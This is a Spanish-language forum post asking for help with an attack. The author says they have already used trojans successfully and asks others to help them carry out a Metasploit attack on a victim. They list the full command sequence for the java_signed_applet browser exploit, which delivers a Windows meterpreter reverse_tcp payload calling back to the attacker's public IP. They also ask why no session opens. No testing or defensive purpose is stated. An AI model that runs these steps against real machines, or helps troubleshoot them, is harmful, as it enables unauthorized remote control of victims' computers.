buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????
preguntas del video ?
primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?
otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?
y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST
cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada
ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor
pasos del ataque :
use exploit/multi/browser/java_signed_applet
show options
set SRVHOST 192.168.1.9
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 194.123.77.33 IP PUBLICA
exploit